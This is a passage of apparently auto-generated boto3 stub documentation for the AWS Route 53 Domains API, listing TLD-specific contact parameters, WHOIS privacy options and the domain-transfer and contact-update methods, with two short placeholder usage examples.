When ContactType is a value other than PERSON , valid values include the following:
ASS (Canadian unincorporated association)
CCO (Canadian corporation)
EDU (Canadian educational institution)
GOV (Government or government entity in Canada)
HOP (Canadian Hospital)
INB (Indian Band recognized by the Indian Act of Canada)
LAM (Canadian Library, Archive, or Museum)
MAJ (Her/His Majesty the Queen/King)
OMK (Official mark registered in Canada)
PLT (Canadian Political Party)
PRT (Partnership Registered in Canada)
TDM (Trademark registered in Canada)
TRD (Canadian Trade Union)
TRS (Trust established in Canada)
.es
ES_IDENTIFICATION Specify the applicable value:
For contacts inside Spain: Enter your passport ID.
For contacts outside of Spain: Enter the VAT identification number for the company.
Note
For .es domains, the value of ContactType must be PERSON .
ES_IDENTIFICATION_TYPE Valid values include the following:
DNI_AND_NIF (For Spanish contacts)
NIE (For foreigners with legal residence)
OTHER (For contacts outside of Spain)
ES_LEGAL_FORM Valid values include the following:
ASSOCIATION
CENTRAL_GOVERNMENT_BODY
CIVIL_SOCIETY
COMMUNITY_OF_OWNERS
COMMUNITY_PROPERTY
CONSULATE
COOPERATIVE
DESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL
ECONOMIC_INTEREST_GROUP
EMBASSY
ENTITY_MANAGING_NATURAL_AREAS
FARM_PARTNERSHIP
FOUNDATION
GENERAL_AND_LIMITED_PARTNERSHIP
GENERAL_PARTNERSHIP
INDIVIDUAL
LIMITED_COMPANY
LOCAL_AUTHORITY
LOCAL_PUBLIC_ENTITY
MUTUAL_INSURANCE_COMPANY
NATIONAL_PUBLIC_ENTITY
ORDER_OR_RELIGIOUS_INSTITUTION
OTHERS (Only for contacts outside of Spain)
POLITICAL_PARTY
PROFESSIONAL_ASSOCIATION
PUBLIC_LAW_ASSOCIATION
PUBLIC_LIMITED_COMPANY
REGIONAL_GOVERNMENT_BODY
REGIONAL_PUBLIC_ENTITY
SAVINGS_BANK
SPANISH_OFFICE
SPORTS_ASSOCIATION
SPORTS_FEDERATION
SPORTS_LIMITED_COMPANY
TEMPORARY_ALLIANCE_OF_ENTERPRISES
TRADE_UNION
WORKER_OWNED_COMPANY
WORKER_OWNED_LIMITED_COMPANY
.fi
BIRTH_DATE_IN_YYYY_MM_DD
FI_BUSINESS_NUMBER
FI_ID_NUMBER
FI_NATIONALITY Valid values include the following:
FINNISH
NOT_FINNISH
FI_ORGANIZATION_TYPE Valid values include the following:
COMPANY
CORPORATION
GOVERNMENT
INSTITUTION
POLITICAL_PARTY
PUBLIC_COMMUNITY
TOWNSHIP
.fr
BIRTH_CITY
BIRTH_COUNTRY
BIRTH_DATE_IN_YYYY_MM_DD
BIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .
BRAND_NUMBER
.it
IT_NATIONALITY
IT_PIN
IT_REGISTRANT_ENTITY_TYPE Valid values include the following:
FOREIGNERS
FREELANCE_WORKERS (Freelance workers and professionals)
ITALIAN_COMPANIES (Italian companies and one-person companies)
NON_PROFIT_ORGANIZATIONS
OTHER_SUBJECTS
PUBLIC_ORGANIZATIONS
.ru
BIRTH_DATE_IN_YYYY_MM_DD
RU_PASSPORT_DATA
.se
BIRTH_COUNTRY
SE_ID_NUMBER
.sg
SG_ID_NUMBER
.co.uk, .me.uk, and .org.uk
UK_CONTACT_TYPE Valid values include the following:
CRC (UK Corporation by Royal Charter)
FCORP (Non-UK Corporation)
FIND (Non-UK Individual, representing self)
FOTHER (Non-UK Entity that does not fit into any other category)
GOV (UK Government Body)
IND (UK Individual (representing self))
IP (UK Industrial/Provident Registered Company)
LLP (UK Limited Liability Partnership)
LTD (UK Limited Company)
OTHER (UK Entity that does not fit into any other category)
PLC (UK Public Limited Company)
PTNR (UK Partnership)
RCHAR (UK Registered Charity)
SCH (UK School)
STAT (UK Statutory Body)
STRA (UK Sole Trader)
UK_COMPANY_NUMBER
In addition, many TLDs require a VAT_NUMBER .
Value (string) -- [REQUIRED]The value that corresponds with the name of an extra parameter.
RegistrantContact (dict) -- [REQUIRED]
Provides detailed contact information.
FirstName (string) --First name of contact.
LastName (string) --Last name of contact.
ContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:
If you specify a value other than PERSON , you must also specify a value for OrganizationName .
For some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide
For .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .
OrganizationName (string) --Name of the organization for contact types other than PERSON .
AddressLine1 (string) --First line of the contact\'s address.
AddressLine2 (string) --Second line of contact\'s address, if any.
City (string) --The city of the contact\'s address.
State (string) --The state or province of the contact\'s city.
CountryCode (string) --Code for the country of the contact\'s address.
ZipCode (string) --The zip or postal code of the contact\'s address.
PhoneNumber (string) --The phone number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code]". For example, a US phone number might appear as "+1.1234567890" .
Email (string) --Email address of the contact.
Fax (string) --Fax number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code]". For example, a US phone number might appear as "+1.1234567890" .
ExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.
(dict) --ExtraParam includes the following elements.
Name (string) -- [REQUIRED]The name of an additional parameter that is required by a top-level domain. Here are the top-level domains that require additional parameters and the names of the parameters that they require:
.com.au and .net.au
AU_ID_NUMBER
AU_ID_TYPE Valid values include the following:
ABN (Australian business number)
ACN (Australian company number)
TM (Trademark number)
.ca
BRAND_NUMBER
CA_BUSINESS_ENTITY_TYPE Valid values include the following:
BANK (Bank)
COMMERCIAL_COMPANY (Commercial company)
COMPANY (Company)
COOPERATION (Cooperation)
COOPERATIVE (Cooperative)
COOPRIX (Cooprix)
CORP (Corporation)
CREDIT_UNION (Credit union)
FOMIA (Federation of mutual insurance associations)
INC (Incorporated)
LTD (Limited)
LTEE (Limitée)
LLC (Limited liability corporation)
LLP (Limited liability partnership)
LTE (Lte.)
MBA (Mutual benefit association)
MIC (Mutual insurance company)
NFP (Not-for-profit corporation)
SA (S.A.)
SAVINGS_COMPANY (Savings company)
SAVINGS_UNION (Savings union)
SARL (Société à responsabilité limitée)
TRUST (Trust)
ULC (Unlimited liability corporation)
CA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:
ABO (Aboriginal Peoples indigenous to Canada)
CCT (Canadian citizen)
LGR (Legal Representative of a Canadian Citizen or Permanent Resident)
RES (Permanent resident of Canada)
When ContactType is a value other than PERSON , valid values include the following:
ASS (Canadian unincorporated association)
CCO (Canadian corporation)
EDU (Canadian educational institution)
GOV (Government or government entity in Canada)
HOP (Canadian Hospital)
INB (Indian Band recognized by the Indian Act of Canada)
LAM (Canadian Library, Archive, or Museum)
MAJ (Her/His Majesty the Queen/King)
OMK (Official mark registered in Canada)
PLT (Canadian Political Party)
PRT (Partnership Registered in Canada)
TDM (Trademark registered in Canada)
TRD (Canadian Trade Union)
TRS (Trust established in Canada)
.es
ES_IDENTIFICATION Specify the applicable value:
For contacts inside Spain: Enter your passport ID.
For contacts outside of Spain: Enter the VAT identification number for the company.
Note
For .es domains, the value of ContactType must be PERSON .
ES_IDENTIFICATION_TYPE Valid values include the following:
DNI_AND_NIF (For Spanish contacts)
NIE (For foreigners with legal residence)
OTHER (For contacts outside of Spain)
ES_LEGAL_FORM Valid values include the following:
ASSOCIATION
CENTRAL_GOVERNMENT_BODY
CIVIL_SOCIETY
COMMUNITY_OF_OWNERS
COMMUNITY_PROPERTY
CONSULATE
COOPERATIVE
DESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL
ECONOMIC_INTEREST_GROUP
EMBASSY
ENTITY_MANAGING_NATURAL_AREAS
FARM_PARTNERSHIP
FOUNDATION
GENERAL_AND_LIMITED_PARTNERSHIP
GENERAL_PARTNERSHIP
INDIVIDUAL
LIMITED_COMPANY
LOCAL_AUTHORITY
LOCAL_PUBLIC_ENTITY
MUTUAL_INSURANCE_COMPANY
NATIONAL_PUBLIC_ENTITY
ORDER_OR_RELIGIOUS_INSTITUTION
OTHERS (Only for contacts outside of Spain)
POLITICAL_PARTY
PROFESSIONAL_ASSOCIATION
PUBLIC_LAW_ASSOCIATION
PUBLIC_LIMITED_COMPANY
REGIONAL_GOVERNMENT_BODY
REGIONAL_PUBLIC_ENTITY
SAVINGS_BANK
SPANISH_OFFICE
SPORTS_ASSOCIATION
SPORTS_FEDERATION
SPORTS_LIMITED_COMPANY
TEMPORARY_ALLIANCE_OF_ENTERPRISES
TRADE_UNION
WORKER_OWNED_COMPANY
WORKER_OWNED_LIMITED_COMPANY
.fi
BIRTH_DATE_IN_YYYY_MM_DD
FI_BUSINESS_NUMBER
FI_ID_NUMBER
FI_NATIONALITY Valid values include the following:
FINNISH
NOT_FINNISH
FI_ORGANIZATION_TYPE Valid values include the following:
COMPANY
CORPORATION
GOVERNMENT
INSTITUTION
POLITICAL_PARTY
PUBLIC_COMMUNITY
TOWNSHIP
.fr
BIRTH_CITY
BIRTH_COUNTRY
BIRTH_DATE_IN_YYYY_MM_DD
BIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .
BRAND_NUMBER
.it
IT_NATIONALITY
IT_PIN
IT_REGISTRANT_ENTITY_TYPE Valid values include the following:
FOREIGNERS
FREELANCE_WORKERS (Freelance workers and professionals)
ITALIAN_COMPANIES (Italian companies and one-person companies)
NON_PROFIT_ORGANIZATIONS
OTHER_SUBJECTS
PUBLIC_ORGANIZATIONS
.ru
BIRTH_DATE_IN_YYYY_MM_DD
RU_PASSPORT_DATA
.se
BIRTH_COUNTRY
SE_ID_NUMBER
.sg
SG_ID_NUMBER
.co.uk, .me.uk, and .org.uk
UK_CONTACT_TYPE Valid values include the following:
CRC (UK Corporation by Royal Charter)
FCORP (Non-UK Corporation)
FIND (Non-UK Individual, representing self)
FOTHER (Non-UK Entity that does not fit into any other category)
GOV (UK Government Body)
IND (UK Individual (representing self))
IP (UK Industrial/Provident Registered Company)
LLP (UK Limited Liability Partnership)
LTD (UK Limited Company)
OTHER (UK Entity that does not fit into any other category)
PLC (UK Public Limited Company)
PTNR (UK Partnership)
RCHAR (UK Registered Charity)
SCH (UK School)
STAT (UK Statutory Body)
STRA (UK Sole Trader)
UK_COMPANY_NUMBER
In addition, many TLDs require a VAT_NUMBER .
Value (string) -- [REQUIRED]The value that corresponds with the name of an extra parameter.
TechContact (dict) -- [REQUIRED]
Provides detailed contact information.
FirstName (string) --First name of contact.
LastName (string) --Last name of contact.
ContactType (string) --Indicates whether the contact is a person, company, association, or public organization. Note the following:
If you specify a value other than PERSON , you must also specify a value for OrganizationName .
For some TLDs, the privacy protection available depends on the value that you specify for Contact Type . For the privacy protection settings for your TLD, see Domains that You Can Register with Amazon Route 53 in the Amazon Route 53 Developer Guide
For .es domains, if you specify PERSON , you must specify INDIVIDUAL for the value of ES_LEGAL_FORM .
OrganizationName (string) --Name of the organization for contact types other than PERSON .
AddressLine1 (string) --First line of the contact\'s address.
AddressLine2 (string) --Second line of contact\'s address, if any.
City (string) --The city of the contact\'s address.
State (string) --The state or province of the contact\'s city.
CountryCode (string) --Code for the country of the contact\'s address.
ZipCode (string) --The zip or postal code of the contact\'s address.
PhoneNumber (string) --The phone number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code]". For example, a US phone number might appear as "+1.1234567890" .
Email (string) --Email address of the contact.
Fax (string) --Fax number of the contact.
Constraints: Phone number must be specified in the format "+[country dialing code].[number including any area code]". For example, a US phone number might appear as "+1.1234567890" .
ExtraParams (list) --A list of name-value pairs for parameters required by certain top-level domains.
(dict) --ExtraParam includes the following elements.
Name (string) -- [REQUIRED]The name of an additional parameter that is required by a top-level domain. Here are the top-level domains that require additional parameters and the names of the parameters that they require:
.com.au and .net.au
AU_ID_NUMBER
AU_ID_TYPE Valid values include the following:
ABN (Australian business number)
ACN (Australian company number)
TM (Trademark number)
.ca
BRAND_NUMBER
CA_BUSINESS_ENTITY_TYPE Valid values include the following:
BANK (Bank)
COMMERCIAL_COMPANY (Commercial company)
COMPANY (Company)
COOPERATION (Cooperation)
COOPERATIVE (Cooperative)
COOPRIX (Cooprix)
CORP (Corporation)
CREDIT_UNION (Credit union)
FOMIA (Federation of mutual insurance associations)
INC (Incorporated)
LTD (Limited)
LTEE (Limitée)
LLC (Limited liability corporation)
LLP (Limited liability partnership)
LTE (Lte.)
MBA (Mutual benefit association)
MIC (Mutual insurance company)
NFP (Not-for-profit corporation)
SA (S.A.)
SAVINGS_COMPANY (Savings company)
SAVINGS_UNION (Savings union)
SARL (Société à responsabilité limitée)
TRUST (Trust)
ULC (Unlimited liability corporation)
CA_LEGAL_TYPE When ContactType is PERSON , valid values include the following:
ABO (Aboriginal Peoples indigenous to Canada)
CCT (Canadian citizen)
LGR (Legal Representative of a Canadian Citizen or Permanent Resident)
RES (Permanent resident of Canada)
When ContactType is a value other than PERSON , valid values include the following:
ASS (Canadian unincorporated association)
CCO (Canadian corporation)
EDU (Canadian educational institution)
GOV (Government or government entity in Canada)
HOP (Canadian Hospital)
INB (Indian Band recognized by the Indian Act of Canada)
LAM (Canadian Library, Archive, or Museum)
MAJ (Her/His Majesty the Queen/King)
OMK (Official mark registered in Canada)
PLT (Canadian Political Party)
PRT (Partnership Registered in Canada)
TDM (Trademark registered in Canada)
TRD (Canadian Trade Union)
TRS (Trust established in Canada)
.es
ES_IDENTIFICATION Specify the applicable value:
For contacts inside Spain: Enter your passport ID.
For contacts outside of Spain: Enter the VAT identification number for the company.
Note
For .es domains, the value of ContactType must be PERSON .
ES_IDENTIFICATION_TYPE Valid values include the following:
DNI_AND_NIF (For Spanish contacts)
NIE (For foreigners with legal residence)
OTHER (For contacts outside of Spain)
ES_LEGAL_FORM Valid values include the following:
ASSOCIATION
CENTRAL_GOVERNMENT_BODY
CIVIL_SOCIETY
COMMUNITY_OF_OWNERS
COMMUNITY_PROPERTY
CONSULATE
COOPERATIVE
DESIGNATION_OF_ORIGIN_SUPERVISORY_COUNCIL
ECONOMIC_INTEREST_GROUP
EMBASSY
ENTITY_MANAGING_NATURAL_AREAS
FARM_PARTNERSHIP
FOUNDATION
GENERAL_AND_LIMITED_PARTNERSHIP
GENERAL_PARTNERSHIP
INDIVIDUAL
LIMITED_COMPANY
LOCAL_AUTHORITY
LOCAL_PUBLIC_ENTITY
MUTUAL_INSURANCE_COMPANY
NATIONAL_PUBLIC_ENTITY
ORDER_OR_RELIGIOUS_INSTITUTION
OTHERS (Only for contacts outside of Spain)
POLITICAL_PARTY
PROFESSIONAL_ASSOCIATION
PUBLIC_LAW_ASSOCIATION
PUBLIC_LIMITED_COMPANY
REGIONAL_GOVERNMENT_BODY
REGIONAL_PUBLIC_ENTITY
SAVINGS_BANK
SPANISH_OFFICE
SPORTS_ASSOCIATION
SPORTS_FEDERATION
SPORTS_LIMITED_COMPANY
TEMPORARY_ALLIANCE_OF_ENTERPRISES
TRADE_UNION
WORKER_OWNED_COMPANY
WORKER_OWNED_LIMITED_COMPANY
.fi
BIRTH_DATE_IN_YYYY_MM_DD
FI_BUSINESS_NUMBER
FI_ID_NUMBER
FI_NATIONALITY Valid values include the following:
FINNISH
NOT_FINNISH
FI_ORGANIZATION_TYPE Valid values include the following:
COMPANY
CORPORATION
GOVERNMENT
INSTITUTION
POLITICAL_PARTY
PUBLIC_COMMUNITY
TOWNSHIP
.fr
BIRTH_CITY
BIRTH_COUNTRY
BIRTH_DATE_IN_YYYY_MM_DD
BIRTH_DEPARTMENT : Specify the INSEE code that corresponds with the department where the contact was born. If the contact was born somewhere other than France or its overseas departments, specify 99 . For more information, including a list of departments and the corresponding INSEE numbers, see the Wikipedia entry Departments of France .
BRAND_NUMBER
.it
IT_NATIONALITY
IT_PIN
IT_REGISTRANT_ENTITY_TYPE Valid values include the following:
FOREIGNERS
FREELANCE_WORKERS (Freelance workers and professionals)
ITALIAN_COMPANIES (Italian companies and one-person companies)
NON_PROFIT_ORGANIZATIONS
OTHER_SUBJECTS
PUBLIC_ORGANIZATIONS
.ru
BIRTH_DATE_IN_YYYY_MM_DD
RU_PASSPORT_DATA
.se
BIRTH_COUNTRY
SE_ID_NUMBER
.sg
SG_ID_NUMBER
.co.uk, .me.uk, and .org.uk
UK_CONTACT_TYPE Valid values include the following:
CRC (UK Corporation by Royal Charter)
FCORP (Non-UK Corporation)
FIND (Non-UK Individual, representing self)
FOTHER (Non-UK Entity that does not fit into any other category)
GOV (UK Government Body)
IND (UK Individual (representing self))
IP (UK Industrial/Provident Registered Company)
LLP (UK Limited Liability Partnership)
LTD (UK Limited Company)
OTHER (UK Entity that does not fit into any other category)
PLC (UK Public Limited Company)
PTNR (UK Partnership)
RCHAR (UK Registered Charity)
SCH (UK School)
STAT (UK Statutory Body)
STRA (UK Sole Trader)
UK_COMPANY_NUMBER
In addition, many TLDs require a VAT_NUMBER .
Value (string) -- [REQUIRED]The value that corresponds with the name of an extra parameter.
PrivacyProtectAdminContact (boolean) -- Whether you want to conceal contact information from WHOIS queries. If you specify true , WHOIS ("who is") queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If you specify false , WHOIS queries return the information that you entered for the admin contact.
Default: true
PrivacyProtectRegistrantContact (boolean) -- Whether you want to conceal contact information from WHOIS queries. If you specify true , WHOIS ("who is") queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If you specify false , WHOIS queries return the information that you entered for the registrant contact (domain owner).
Default: true
PrivacyProtectTechContact (boolean) -- Whether you want to conceal contact information from WHOIS queries. If you specify true , WHOIS ("who is") queries return contact information either for Amazon Registrar (for .com, .net, and .org domains) or for our registrar associate, Gandi (for all other TLDs). If you specify false , WHOIS queries return the information that you entered for the technical contact.
Default: true
"""
pass
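# --- Illustrative sketch (not part of the generated stubs) ---
# The contact parameters documented above all share the same ContactDetail
# shape, and the ExtraParams list carries the TLD-specific fields listed in the
# docstring. A minimal example of building a .fr registrant contact dict; the
# names, address, and values below are placeholders.
def _example_contact_with_extra_params():
    registrant_contact = {
        'FirstName': 'Marie',
        'LastName': 'Curie',
        'ContactType': 'PERSON',
        'AddressLine1': '1 Rue Exemple',
        'City': 'Paris',
        'CountryCode': 'FR',
        'ZipCode': '75001',
        'PhoneNumber': '+33.123456789',
        'Email': 'marie@example.com',
        # .fr requires birth details; BIRTH_DEPARTMENT takes the INSEE code,
        # or 99 for contacts born outside France and its overseas departments.
        'ExtraParams': [
            {'Name': 'BIRTH_DATE_IN_YYYY_MM_DD', 'Value': '1980-01-31'},
            {'Name': 'BIRTH_CITY', 'Value': 'Paris'},
            {'Name': 'BIRTH_COUNTRY', 'Value': 'FR'},
            {'Name': 'BIRTH_DEPARTMENT', 'Value': '75'},
        ],
    }
    return registrant_contact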
def transfer_domain_to_another_aws_account(DomainName=None, AccountId=None):
"""
Transfers a domain from the current AWS account to another AWS account. Note the following:
Use either ListOperations or GetOperationDetail to determine whether the operation succeeded. GetOperationDetail provides additional information, for example, Domain Transfer from Aws Account 111122223333 has been cancelled .
See also: AWS API Documentation
Exceptions
:example: response = client.transfer_domain_to_another_aws_account(
DomainName='string',
AccountId='string'
)
:type DomainName: string
:param DomainName: [REQUIRED]\nThe name of the domain that you want to transfer from the current AWS account to another account.\n
:type AccountId: string
:param AccountId: [REQUIRED]\nThe account ID of the AWS account that you want to transfer the domain to, for example, 111122223333 .\n
:rtype: dict
ReturnsResponse Syntax
{
'OperationId': 'string',
'Password': 'string'
}
Response Structure
(dict) --
The TransferDomainToAnotherAwsAccount response includes the following elements.
OperationId (string) --
Identifier for tracking the progress of the request. To query the operation status, use GetOperationDetail .
Password (string) --
To finish transferring a domain to another AWS account, the account that the domain is being transferred to must submit an AcceptDomainTransferFromAnotherAwsAccount request. The request must include the value of the Password element that was returned in the TransferDomainToAnotherAwsAccount response.
Exceptions
Route53Domains.Client.exceptions.InvalidInput
Route53Domains.Client.exceptions.OperationLimitExceeded
Route53Domains.Client.exceptions.DuplicateRequest
:return: {
'OperationId': 'string',
'Password': 'string'
}
:returns:
DomainName (string) -- [REQUIRED]
The name of the domain that you want to transfer from the current AWS account to another account.
AccountId (string) -- [REQUIRED]
The account ID of the AWS account that you want to transfer the domain to, for example, 111122223333 .
"""
pass
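# --- Illustrative sketch (not part of the generated stubs) ---
# A minimal example of the two-account transfer flow described above: the
# sending account calls transfer_domain_to_another_aws_account, then the
# receiving account submits the returned Password via
# accept_domain_transfer_from_another_aws_account. The domain name, account ID,
# and profile names are placeholders; boto3 and credentials for both accounts
# are assumed.
def _example_transfer_domain_between_accounts():
    import boto3

    sender = boto3.Session(profile_name='sending-account').client('route53domains')
    response = sender.transfer_domain_to_another_aws_account(
        DomainName='example.com',
        AccountId='111122223333',
    )

    # The receiving account completes the transfer with the returned password.
    receiver = boto3.Session(profile_name='receiving-account').client('route53domains')
    receiver.accept_domain_transfer_from_another_aws_account(
        DomainName='example.com',
        Password=response['Password'],
    )
    return response['OperationId']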
def update_domain_contact(DomainName=None, AdminContact=None, RegistrantContact=None, TechContact=None):
"""
This operation updates the contact information for a particular domain. You must specify information for at least one contact: registrant, administrator, or technical.
If the update is successful, this method returns an operation ID that you can use to track the progress and completion of the action. If the request is not completed successfully, the domain registrant will be notified by email.
See also: AWS API Documentation
Exceptions
:example: response = client.update_domain_contact(
DomainName='string',
AdminContact={
'FirstName': 'string',
'LastName': 'string',
'ContactType': 'PERSON'|'COMPANY'|'ASSOCIATION'|'PUBLIC_BODY'|'RESELLER',
'OrganizationName': 'string',
'AddressLine1': 'string',
'AddressLine2': 'string',
'City': 'string',
'State': 'string',
'CountryCode': 'AD'|'AE'|'AF'|'AG'|'AI'|'AL'|'AM'|'AN'|'AO'|'AQ'|'AR'|'AS'|'AT'|'AU'|'AW'|'AZ'|'BA'|'BB'|'BD'|'BE'|'BF'|'BG'|'BH'|'BI'|'BJ'|'BL'|'BM'|'BN'|'BO'|'BR'|'BS'|'BT'|'BW'|'BY'|'BZ'|'CA'|'CC'|'CD'|'CF'|'CG'|'CH'|'CI'|'CK'|'CL'|'CM'|'CN'|'CO'|'CR'|'CU'|'CV'|'CX'|'CY'|'CZ'|'DE'|'DJ'|'DK'|'DM'|'DO'|'DZ'|'EC'|'EE'|'EG'|'ER'|'ES'|'ET'|'FI'|'FJ'|'FK'|'FM'|'FO'|'FR'|'GA'|'GB'|'GD'|'GE'|'GH'|'GI'|'GL'|'GM'|'GN'|'GQ'|'GR'|'GT'|'GU'|'GW'|'GY'|'HK'|'HN'|'HR'|'HT'|'HU'|'ID'|'IE'|'IL'|'IM'|'IN'|'IQ'|'IR'|'IS'|'IT'|'JM'|'JO'|'JP'|'KE'|'KG'|'KH'|'KI'|'KM'|'KN'|'KP'|'KR'|'KW'|'KY'|'KZ'|'LA'|'LB'|'LC'|'LI'|'LK'|'LR'|'LS'|'LT'|'LU'|'LV'|'LY'|'MA'|'MC'|'MD'|'ME'|'MF'|'MG'|'MH'|'MK'|'ML'|'MM'|'MN'|'MO'|'MP'|'MR'|'MS'|'MT'|'MU'|'MV'|'MW'|'MX'|'MY'|'MZ'|'NA'|'NC'|'NE'|'NG'|'NI'|'NL'|'NO'|'NP'|'NR'|'NU'|'NZ'|'OM'|'PA'|'PE'|'PF'|'PG'|'PH'|'PK'|'PL'|'PM'|'PN'|'PR'|'PT'|'PW'|'PY'|'QA'|'RO'|'RS'|'RU'|'RW'|'SA'|'SB'|'SC'|'SD'|'SE'|'SG'|'SH'|'SI'|'SK'|'SL'|'SM'|'SN'|'SO'|'SR'|'ST'|'SV'|'SY'|'SZ'|'TC'|'TD'|'TG'|'TH'|'TJ'|'TK'|'TL'|'TM'|'TN'|'TO'|'TR'|'TT'|'TV'|'TW'|'TZ'|'UA'|'UG'|'US'|'UY'|'UZ'|'VA'|'VC'|'VE'|'VG'|'VI'|'VN'|'VU'|'WF'|'WS'|'YE'|'YT'|'ZA'|'ZM'|'ZW',
'ZipCode': 'string',
'PhoneNumber': 'string',
'Email': 'string',
'Fax': 'string',
'ExtraParams': [
{
'Name': 'DUNS_NUMBER'|'BRAND_NUMBER'|'BIRTH_DEPARTMENT'|'BIRTH_DATE_IN_YYYY_MM_DD'|'BIRTH_COUNTRY'|'BIRTH_CITY'|'DOCUMENT_NUMBER'|'AU_ID_NUMBER'|'AU_ID_TYPE'|'CA_LEGAL_TYPE'|'CA_BUSINESS_ENTITY_TYPE'|'CA_LEGAL_REPRESENTATIVE'|'CA_LEGAL_REPRESENTATIVE_CAPACITY'|'ES_IDENTIFICATION'|'ES_IDENTIFICATION_TYPE'|'ES_LEGAL_FORM'|'FI_BUSINESS_NUMBER'|'FI_ID_NUMBER'|'FI_NATIONALITY'|'FI_ORGANIZATION_TYPE'|'IT_NATIONALITY'|'IT_PIN'|'IT_REGISTRANT_ENTITY_TYPE'|'RU_PASSPORT_DATA'|'SE_ID_NUMBER'|'SG_ID_NUMBER'|'VAT_NUMBER'|'UK_CONTACT_TYPE'|'UK_COMPANY_NUMBER',
'Value': 'string'
},
]
},
RegistrantContact={
'FirstName': 'string',
'LastName': 'string',
'ContactType': 'PERSON'|'COMPANY'|'ASSOCIATION'|'PUBLIC_BODY'|'RESELLER',
'OrganizationName': 'string',
'AddressLine1': 'string',
'AddressLine2': 'string',
'City': 'string',
'State': 'string',
'CountryCode': 'AD'|'AE'|'AF'|'AG'|'AI'|'AL'|'AM'|'AN'|'AO'|'AQ'|'AR'|'AS'|'AT'|'AU'|'AW'|'AZ'|'BA'|'BB'|'BD'|'BE'|'BF'|'BG'|'BH'|'BI'|'BJ'|'BL'|'BM'|'BN'|'BO'|'BR'|'BS'|'BT'|'BW'|'BY'|'BZ'|'CA'|'CC'|'CD'|'CF'|'CG'|'CH'|'CI'|'CK'|'CL'|'CM'|'CN'|'CO'|'CR'|'CU'|'CV'|'CX'|'CY'|'CZ'|'DE'|'DJ'|'DK'|'DM'|'DO'|'DZ'|'EC'|'EE'|'EG'|'ER'|'ES'|'ET'|'FI'|'FJ'|'FK'|'FM'|'FO'|'FR'|'GA'|'GB'|'GD'|'GE'|'GH'|'GI'|'GL'|'GM'|'GN'|'GQ'|'GR'|'GT'|'GU'|'GW'|'GY'|'HK'|'HN'|'HR'|'HT'|'HU'|'ID'|'IE'|'IL'|'IM'|'IN'|'IQ'|'IR'|'IS'|'IT'|'JM'|'JO'|'JP'|'KE'|'KG'|'KH'|'KI'|'KM'|'KN'|'KP'|'KR'|'KW'|'KY'|'KZ'|'LA'|'LB'|'LC'|'LI'|'LK'|'LR'|'LS'|'LT'|'LU'|'LV'|'LY'|'MA'|'MC'|'MD'|'ME'|'MF'|'MG'|'MH'|'MK'|'ML'|'MM'|'MN'|'MO'|'MP'|'MR'|'MS'|'MT'|'MU'|'MV'|'MW'|'MX'|'MY'|'MZ'|'NA'|'NC'|'NE'|'NG'|'NI'|'NL'|'NO'|'NP'|'NR'|'NU'|'NZ'|'OM'|'PA'|'PE'|'PF'|'PG'|'PH'|'PK'|'PL'|'PM'|'PN'|'PR'|'PT'|'PW'|'PY'|'QA'|'RO'|'RS'|'RU'|'RW'|'SA'|'SB'|'SC'|'SD'|'SE'|'SG'|'SH'|'SI'|'SK'|'SL'|'SM'|'SN'|'SO'|'SR'|'ST'|'SV'|'SY'|'SZ'|'TC'|'TD'|'TG'|'TH'|'TJ'|'TK'|'TL'|'TM'|'TN'|'TO'|'TR'|'TT'|'TV'|'TW'|'TZ'|'UA'|'UG'|'US'|'UY'|'UZ'|'VA'|'VC'|'VE'|'VG'|'VI'|'VN'|'VU'|'WF'|'WS'|'YE'|'YT'|'ZA'|'ZM'|'ZW',
'ZipCode': 'string',
'PhoneNumber': 'string',
'Email': 'string',
'Fax': 'string',
'ExtraParams': [
{
'Name': 'DUNS_NUMBER'|'BRAND_NUMBER'|'BIRTH_DEPARTMENT'|'BIRTH_DATE_IN_YYYY_MM_DD'|'BIRTH_COUNTRY'|'BIRTH_CITY'|'DOCUMENT_NUMBER'|'AU_ID_NUMBER'|'AU_ID_TYPE'|'CA_LEGAL_TYPE'|'CA_BUSINESS_ENTITY_TYPE'|'CA_LEGAL_REPRESENTATIVE'|'CA_LEGAL_REPRESENTATIVE_CAPACITY'|'ES_IDENTIFICATION'|'ES_IDENTIFICATION_TYPE'|'ES_LEGAL_FORM'|'FI_BUSINESS_NUMBER'|'FI_ID_NUMBER'|'FI_NATIONALITY'|'FI_ORGANIZATION_TYPE'|'IT_NATIONALITY'|'IT_PIN'|'IT_REGISTRANT_ENTITY_TYPE'|'RU_PASSPORT_DATA'|'SE_ID_NUMBER'|'SG_ID_NUMBER'|'VAT_NUMBER'|'UK_CONTACT_TYPE'|'UK_COMPANY_NUMBER',
'Value': 'string'
},
]
},
TechContact={
'FirstName': 'string',
'LastName': 'string',
'ContactType': 'PERSON'|'COMPANY'|'ASSOCIATION'|'PUBLIC_BODY'|'RESELLER',
'OrganizationName': 'string',
'AddressLine1': 'string',
'AddressLine2': 'string',
'City': 'string',
'State': 'string',
